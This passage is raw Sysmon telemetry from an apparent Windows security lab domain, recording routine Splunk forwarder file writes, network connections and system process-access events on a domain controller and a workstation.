23542300x8000000000000000102760Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:24.045{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BE2F5CF3BB5CB2C4F1C5AAD355E2F9F,SHA256=74EE1C357CCCD1DC2B7E62D65E7110C82ADFCBC03522CA48CE7F7307F01A2141,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080600Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:25.629{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB2EE3947B5882EAE6E132AEE16E3C3A,SHA256=2260ACFEE052C7F86C1FE64628ED89EE46B11976E375DA7572B06CA8E3B1E0C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102761Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:25.061{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14263F565830565BB57F1F7C631F9CDC,SHA256=3DF0896FC7381FDCAB46653A2F5C6C3344C2E506A152BCA34CFDB1543084AC6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080602Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:24.664{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49973-false10.0.1.12-8000- 23542300x800000000000000080601Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:26.629{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93756FA1C3B667D5347C54C5E99A058A,SHA256=6EDC8178240BE5C976200D8CBA5CB6E87DCC564CF2F99E486FC2E8B0B4D73714,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102763Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:24.479{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49463-false10.0.1.12-8000- 23542300x8000000000000000102762Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:26.061{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5436B9C6DD8950417D6213C4A6DDBF3,SHA256=1AFED5811EB8986C934A262B3918C84E3ECE1BDC7F6D05458402D6B00A992EB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080603Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:27.645{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FA73EAB9C46B132E82AB8B564874A0D,SHA256=461ED8143E3F27E205A7489961549C9025A7AB667A80666E08F5947A81C5D932,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102764Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:27.077{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E09CEA5CB9C9B6A9A586DA1F1C2CACA5,SHA256=05CBCA4C7E511571E9DB3B84FD4AC1A0399A3575A428C90392768233ECA431CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080604Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:28.645{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44E7A439E5D1790BC50ADFCCCC04AE6D,SHA256=A752760D9F57C39A05B1B6C67B42D0EDAD8A3AF54191F125847D7654CFE6DE54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102765Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:28.077{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66EDB70A850ED6D74E7B82E3798B0B78,SHA256=6BAA486145B8204A32353A7E1D1040A7D35951BA87EFE7DB29478E27A25E57B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080606Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:29.645{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D2B21B22FBA328702EE1CB0A62AE294,SHA256=2418CD38E0BF7AB1FF3D8F6D670AAD856B686561867353366208970C51D2DEDE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102769Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:29.639{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-AC86-615A-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000102768Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:29.639{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-ACA4-615A-0A00-00000000FC01}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cca|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102767Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:29.639{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-ACA4-615A-0A00-00000000FC01}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000102766Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:29.092{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AEB860633C077F65A3F9B72494F2D9E,SHA256=5F47DBEC310F5DB19F82EC9D7AEF9EC542B16FAF940B1860087439CB9486BE2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080605Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:29.566{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080607Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:30.645{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AAB19D0A4775D90B8DF78E599D7D7DD,SHA256=8B54AC6C71776F264FBD039EDA687E78AB6CA14005B3C73224C5E04A9662C726,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102772Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:30.639{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1A349657D2B34F081817F8C66445382,SHA256=A77DD7D3087FC59013A76A9EDEFC69BD638B779D6DB147ADA6420D4A9BC130F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102771Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:30.639{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A67DFA500CF266866DB40968FB6C753,SHA256=D254055DF6A3DEA7B2B85E9CD6886ADD65F40BC8234E20C078BB59C021E4C876,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102770Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:30.092{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E788DCF94CF6B16D8460C9E8024B827,SHA256=8B47013EE8E7E5A967953BB04114BB139907F277C716202269555BE0F7BF57B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080622Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.645{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85EEC33CEA31F972236AFD44FB694710,SHA256=3C34EBEBC9925780D0BC46B435A469FCC9B5341268BBB0CF8FA5BFC169FEDE3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102776Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:29.871{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49465-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000102775Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:29.871{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49465-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000102774Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:29.495{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49464-false10.0.1.12-8000- 23542300x8000000000000000102773Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:31.092{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6B987AB5E68A518764ED866892B4398,SHA256=9DB518F1534904EE881D261C2315EA9852948E8F4B11CDE4D725BDC91ECF57AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080621Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B157-615A-2601-00000000FD01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080620Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080619Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080618Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080617Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080616Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080615Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080614Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080613Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080612Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080611Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B157-615A-2601-00000000FD01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080610Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.457{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B157-615A-2601-00000000FD01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 